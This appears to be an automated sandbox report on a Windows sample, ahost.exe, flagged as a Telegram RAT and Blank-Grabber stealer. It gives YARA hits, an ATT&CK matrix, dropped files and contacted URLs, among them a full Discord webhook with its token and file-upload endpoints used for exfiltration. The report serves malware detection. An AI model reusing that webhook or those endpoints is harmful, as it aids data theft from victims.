Source: Yara match	File source: 00000000.00000003.1394231148.00000254B9325000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1417333424.000002162BEB5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ahost.exe PID: 7272, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ahost.exe PID: 7328, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\_MEI72722\rarreg.key, type: DROPPED

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: ahost.exe PID: 7328, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	241 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 File and Directory Permissions Modification	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	1 Native API	2 Registry Run Keys / Startup Folder	1 Access Token Manipulation	4 Disable or Modify Tools	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	3 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	1 System Shutdown/Reboot
Email Addresses	DNS Server	Domain Accounts	122 Command and Scripting Interpreter	Logon Script (Windows)	11 Process Injection	11 Deobfuscate/Decode Files or Information	Security Account Manager	58 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 PowerShell	Login Hook	2 Registry Run Keys / Startup Folder	21 Obfuscated Files or Information	NTDS	261 Security Software Discovery	Distributed Component Object Model	1 Clipboard Data	5 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Software Packing	LSA Secrets	2 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Timestomp	Cached Domain Credentials	151 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Masquerading	Proc Filesystem	1 Remote System Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Modify Registry	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	151 Virtualization/Sandbox Evasion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Access Token Manipulation	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	11 Process Injection	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
ahost.exe	37%	ReversingLabs	Win64.Trojan.Generic

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\_MEI72722\VCRUNTIME140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI72722\_bz2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI72722\_ctypes.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI72722\_decimal.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI72722\_hashlib.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI72722\_lzma.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI72722\_queue.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI72722\_socket.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI72722\_sqlite3.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI72722\_ssl.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI72722\libcrypto-3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI72722\libffi-8.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI72722\libssl-3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI72722\python313.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI72722\select.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI72722\sqlite3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI72722\unicodedata.pyd	0%	ReversingLabs

Name	IP	Active	Malicious
discord.com	162.159.135.232	true	false
ip-api.com	208.95.112.1	true	true
blank-baxwq.in	unknown	unknown	false

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://discord.com/api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPsm1-wFNZP3qTm1buU6tOMG	false

URLs from Memory and Binaries

Name	Source	Malicious
https://duckduckgo.com/chrome_newtab	ahost.exe, 00000002.00000002.1869730521.000002162BEEC000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/Blank-c/BlankOBF	ahost.exe, 00000002.00000003.1414867373.000002162C0BE000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1413977247.000002162C414000.00000004.00000020.00020000.00000000.sdmp	false
https://www.avito.ru/	ahost.exe, 00000002.00000002.1871841090.000002162C780000.00000004.00001000.00020000.00000000.sdmp	false
https://duckduckgo.com/ac/?q=	ahost.exe, 00000002.00000002.1869730521.000002162BEEC000.00000004.00000020.00020000.00000000.sdmp	false
https://api.telegram.org/bot	ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1417333424.000002162BEB5000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/Blank-c/Blank-Grabberi	ahost.exe, 00000002.00000003.1416795269.000002162BD6C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416947939.000002162BDAA000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1417333424.000002162BEB5000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmp	false
https://www.ctrip.com/	ahost.exe, 00000002.00000002.1871989503.000002162C8FC000.00000004.00001000.00020000.00000000.sdmp	false
https://github.com/urllib3/urllib3/issues/2168	ahost.exe, 00000002.00000003.1417480354.000002162BD7C000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#	ahost.exe, 00000002.00000002.1868931572.0000021629F34000.00000004.00000020.00020000.00000000.sdmp	false
https://support.mozilla.org/produ	ahost.exe, 00000002.00000003.1557058738.000002162CD5D000.00000004.00000020.00020000.00000000.sdmp	false
https://www.leboncoin.fr/	ahost.exe, 00000002.00000002.1871989503.000002162C94C000.00000004.00001000.00020000.00000000.sdmp	false
http://cacerts.digi?Sx	ahost.exe, 00000000.00000003.1392217601.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389652136.00000254B9320000.00000004.00000020.00020000.00000000.sdmp	false
https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-file	ahost.exe, 00000002.00000002.1870511301.000002162C000000.00000004.00000020.00020000.00000000.sdmp	false
https://tools.ietf.org/html/rfc2388#section-4.4	ahost.exe, 00000002.00000002.1870511301.000002162C000000.00000004.00000020.00020000.00000000.sdmp	false
https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64	ahost.exe, 00000002.00000003.1402625543.000002162BDB8000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1417086110.000002162BD54000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1414363268.000002162BD8C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1412497532.000002162BD8C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1869730521.000002162BD46000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmp	false
https://weibo.com/	ahost.exe, 00000002.00000002.1871989503.000002162C94C000.00000004.00001000.00020000.00000000.sdmp	false
https://api.anonfiles.com/upload	ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmp	false
https://packaging.python.org/en/latest/specifications/entry-points/#file-format	ahost.exe, 00000002.00000002.1870511301.000002162C000000.00000004.00000020.00020000.00000000.sdmp	false
https://discord.com/api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPs	ahost.exe, 00000002.00000002.1871698270.000002162C660000.00000004.00001000.00020000.00000000.sdmp	false
https://www.msn.com	ahost.exe, 00000002.00000002.1874902804.000002162D8F8000.00000004.00001000.00020000.00000000.sdmp	false
https://nuget.org/nuget.exe	powershell.exe, 0000000C.00000002.1528551982.000001FBD11B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1715027533.0000017B11796000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1646857023.0000017B03038000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1715027533.0000017B11654000.00000004.00000800.00020000.00000000.sdmp	false
https://discord.com/api/v9/users/	ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963	ahost.exe, 00000002.00000002.1871480302.000002162C410000.00000004.00001000.00020000.00000000.sdmp	false
http://cacerts.digi	ahost.exe, 00000000.00000003.1392217601.00000254B9320000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000000.00000003.1389652136.00000254B9320000.00000004.00000020.00020000.00000000.sdmp	false
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GNzbMA16ssY5	ahost.exe, 00000002.00000003.1580871553.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1572100939.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1588437582.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1565162708.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1580871553.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/Blank-c/Blank-Grabberr#	ahost.exe, 00000002.00000003.1416795269.000002162BD6C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416947939.000002162BDAA000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1417333424.000002162BEB5000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmp	false
https://peps.python.org/pep-0205/	ahost.exe, 00000002.00000003.1397661863.000002162B9B1000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmp	false
https://www.reddit.com/	ahost.exe, 00000002.00000002.1871989503.000002162C8FC000.00000004.00001000.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1871989503.000002162C94C000.00000004.00001000.00020000.00000000.sdmp	false
https://github.com/urllib3/urllib3/issues/3020	ahost.exe, 00000002.00000003.1417480354.000002162BD7C000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000000C.00000002.1503740397.000001FBC1141000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1646857023.0000017B015E1000.00000004.00000800.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename	ahost.exe, 00000002.00000002.1869508336.000002162B9B0000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1401051914.000002162B9DF000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1869186848.000002162B7A0000.00000004.00001000.00020000.00000000.sdmp	false
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy	ahost.exe, 00000002.00000002.1871841090.000002162C780000.00000004.00001000.00020000.00000000.sdmp	false
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688	ahost.exe, 00000002.00000002.1869186848.000002162B824000.00000004.00001000.00020000.00000000.sdmp	false
https://www.ebay.co.uk/	ahost.exe, 00000002.00000002.1871989503.000002162C8FC000.00000004.00001000.00020000.00000000.sdmp	false
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000046.00000002.1646857023.0000017B02EC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1646857023.0000017B02D49000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 0000000C.00000002.1503740397.000001FBC1368000.00000004.00000800.00020000.00000000.sdmp	false
https://www.ebay.de/	ahost.exe, 00000002.00000002.1871989503.000002162C8FC000.00000004.00001000.00020000.00000000.sdmp	false
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000046.00000002.1646857023.0000017B02EC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1646857023.0000017B02D49000.00000004.00000800.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code	ahost.exe, 00000002.00000002.1869186848.000002162B7A0000.00000004.00001000.00020000.00000000.sdmp	false
https://go.micro	powershell.exe, 00000046.00000002.1646857023.0000017B02214000.00000004.00000800.00020000.00000000.sdmp	false
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader	ahost.exe, 00000002.00000002.1868931572.0000021629F34000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/python/cpython/issues/86361.	ahost.exe, 00000002.00000002.1870511301.000002162C000000.00000004.00000020.00020000.00000000.sdmp	false
http://crl.mic	powershell.exe, 0000000C.00000002.1542004672.000001FBD9982000.00000004.00000020.00020000.00000000.sdmp	false
https://contoso.com/Icon	powershell.exe, 00000046.00000002.1715027533.0000017B11654000.00000004.00000800.00020000.00000000.sdmp	false
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	ahost.exe, 00000002.00000002.1869730521.000002162BEEC000.00000004.00000020.00020000.00000000.sdmp	false
https://httpbin.org/	ahost.exe, 00000002.00000003.1602387295.000002162C36A000.00000004.00000020.00020000.00000000.sdmp	false
http://crl.ver)	svchost.exe, 00000015.00000002.2645655275.0000021787484000.00000004.00000020.00020000.00000000.sdmp	false
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	ahost.exe, 00000000.00000003.1393812542.00000254B9320000.00000004.00000020.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module	ahost.exe, 00000002.00000002.1869186848.000002162B7A0000.00000004.00001000.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches	ahost.exe, 00000002.00000002.1869186848.000002162B7A0000.00000004.00001000.00020000.00000000.sdmp	false
https://www.ecosia.org/newtab/	ahost.exe, 00000002.00000002.1869730521.000002162BEEC000.00000004.00000020.00020000.00000000.sdmp	false
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	ahost.exe, 00000002.00000003.1580871553.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1547191793.000002162C35D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1572100939.000002162C36C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1588437582.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1568240173.000002162C3C3000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1565162708.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1580871553.000002162C3E7000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1557058738.000002162CD5D000.00000004.00000020.00020000.00000000.sdmp	false
https://www.youtube.com/	ahost.exe, 00000002.00000002.1871989503.000002162C8FC000.00000004.00001000.00020000.00000000.sdmp	false
https://allegro.pl/	ahost.exe, 00000002.00000002.1871989503.000002162C94C000.00000004.00001000.00020000.00000000.sdmp	false
https://github.com/Pester/Pester	powershell.exe, 00000046.00000002.1646857023.0000017B02EC2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.1646857023.0000017B02D49000.00000004.00000800.00020000.00000000.sdmp	false
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535	ahost.exe, 00000002.00000003.1601685173.000002162C22F000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1633476242.000002162C22F000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1572100939.000002162C22F000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1549319883.000002162C22F000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1870768302.000002162C24D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1559624480.000002162C22F000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1869730521.000002162BD46000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1613125448.000002162C22F000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy	ahost.exe, 00000002.00000002.1868931572.0000021629F34000.00000004.00000020.00020000.00000000.sdmp	false
https://MD8.mozilla.org/1/m	ahost.exe, 00000002.00000002.1871989503.000002162C94C000.00000004.00001000.00020000.00000000.sdmp	false
https://packaging.python.org/en/latest/specifications/core-metadata/#core-metadata	ahost.exe, 00000002.00000002.1871698270.000002162C660000.00000004.00001000.00020000.00000000.sdmp	false
https://www.bbc.co.uk/	ahost.exe, 00000002.00000002.1871989503.000002162C94C000.00000004.00001000.00020000.00000000.sdmp	false
https://bugzilla.mo	ahost.exe, 00000002.00000002.1871989503.000002162C8B4000.00000004.00001000.00020000.00000000.sdmp	false
https://g.live.com/odclientsettings/Prod-C:	svchost.exe, 00000015.00000003.1476407714.0000021787633000.00000004.00000800.00020000.00000000.sdmp	false
https://github.com/python/importlib_metadata/wiki/Development-Methodology	ahost.exe, 00000002.00000002.1871841090.000002162C780000.00000004.00001000.00020000.00000000.sdmp	false
http://tools.ietf.org/html/rfc6125#section-6.4.3	ahost.exe, 00000002.00000002.1871841090.000002162C780000.00000004.00001000.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000000C.00000002.1503740397.000001FBC1368000.00000004.00000800.00020000.00000000.sdmp	false
https://google.com/mail	ahost.exe, 00000002.00000003.1549319883.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1559624480.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1599255972.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1632395515.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1577999241.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1572100939.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1605942422.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1869730521.000002162BD46000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1870964943.000002162C342000.00000004.00000020.00020000.00000000.sdmp	false
https://packaging.python.org/specifications/entry-points/	ahost.exe, 00000002.00000002.1869730521.000002162BD00000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1871841090.000002162C780000.00000004.00001000.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1871595223.000002162C540000.00000004.00001000.00020000.00000000.sdmp	false
https://www.python.org/psf/license/)	ahost.exe, 00000002.00000002.1878937308.00007FF8E78B8000.00000040.00000001.01000000.00000004.sdmp	false
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py	ahost.exe, 00000002.00000002.1868931572.0000021629F34000.00000004.00000020.00020000.00000000.sdmp	false
https://www.google.com/	ahost.exe, 00000002.00000002.1871989503.000002162C8FC000.00000004.00001000.00020000.00000000.sdmp	false
https://www.iqiyi.com/	ahost.exe, 00000002.00000002.1871989503.000002162C94C000.00000004.00001000.00020000.00000000.sdmp	false
https://foss.heptapod.net/pypy/pypy/-/issues/3539	ahost.exe, 00000002.00000002.1871480302.000002162C410000.00000004.00001000.00020000.00000000.sdmp	false
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.	ahost.exe, 00000002.00000002.1870511301.000002162C000000.00000004.00000020.00020000.00000000.sdmp	false
http://google.com/	ahost.exe, 00000002.00000002.1870511301.000002162C000000.00000004.00000020.00020000.00000000.sdmp	false
http://ocsp.sectigo.com0	ahost.exe, 00000000.00000003.1393812542.00000254B9320000.00000004.00000020.00020000.00000000.sdmp	false
https://tools.ietf.org/html/rfc7231#section-4.3.6)	ahost.exe, 00000002.00000003.1579668380.000002162BE02000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1619630084.000002162BE11000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1869730521.000002162BE11000.00000004.00000020.00020000.00000000.sdmp	false
https://api.gofile.io/getServerr~	ahost.exe, 00000002.00000003.1416795269.000002162BD6C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416947939.000002162BDAA000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1417333424.000002162BEB5000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmp	false
https://contoso.com/License	powershell.exe, 00000046.00000002.1715027533.0000017B11654000.00000004.00000800.00020000.00000000.sdmp	false
https://discordapp.com/api/v9/users/	ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1417333424.000002162BEB5000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source	ahost.exe, 00000002.00000002.1869186848.000002162B824000.00000004.00001000.00020000.00000000.sdmp	false
http://ip-api.com/json/?fields=225545r	ahost.exe, 00000002.00000003.1416795269.000002162BD6C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416947939.000002162BDAA000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1417333424.000002162BEB5000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmp	false
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	ahost.exe, 00000002.00000002.1869730521.000002162BEEC000.00000004.00000020.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec	ahost.exe, 00000002.00000002.1869186848.000002162B7A0000.00000004.00001000.00020000.00000000.sdmp	false
https://github.com/urllib3/urllib3/issues/2920	ahost.exe, 00000002.00000002.1871841090.000002162C780000.00000004.00001000.00020000.00000000.sdmp	false
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	ahost.exe, 00000000.00000003.1393812542.00000254B9320000.00000004.00000020.00020000.00000000.sdmp	false
https://api.gofile.io/getServerr~r	ahost.exe, 00000002.00000003.1416795269.000002162BD6C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416947939.000002162BDAA000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1417333424.000002162BEB5000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data	ahost.exe, 00000002.00000002.1869508336.000002162B9B0000.00000004.00000020.00020000.00000000.sdmp	false
https://yahoo.com/	ahost.exe, 00000002.00000003.1549319883.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1559624480.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1599255972.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1632395515.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1577999241.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1572100939.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1605942422.000002162C342000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1869730521.000002162BD46000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1870964943.000002162C342000.00000004.00000020.00020000.00000000.sdmp	false
https://account.bellmedia.c	ahost.exe, 00000002.00000002.1874902804.000002162D8F8000.00000004.00001000.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1618434399.000002162D061000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1602338590.000002162D061000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1632068064.000002162D05C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1596519190.000002162D05C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1642271166.000002162D061000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1873852301.000002162D05C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1866135475.000002162D05C000.00000004.00000020.00020000.00000000.sdmp	false
http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6	ahost.exe, 00000002.00000002.1870511301.000002162C000000.00000004.00000020.00020000.00000000.sdmp	false
https://login.microsoftonline.com	ahost.exe, 00000002.00000002.1874902804.000002162D8D8000.00000004.00001000.00020000.00000000.sdmp	false
http://crl.thawte.com/ThawteTimestampingCA.crl0	ahost.exe, 00000000.00000003.1393812542.00000254B9320000.00000004.00000020.00020000.00000000.sdmp	false
https://html.spec.whatwg.org/multipage/	ahost.exe, 00000002.00000003.1549319883.000002162C268000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1601685173.000002162C268000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1633476242.000002162C268000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1643405350.000002162C268000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1870768302.000002162C268000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1613125448.000002162C268000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1559624480.000002162C268000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1572100939.000002162C268000.00000004.00000020.00020000.00000000.sdmp	false
https://www.ifeng.com/	ahost.exe, 00000002.00000002.1871989503.000002162C94C000.00000004.00001000.00020000.00000000.sdmp	false
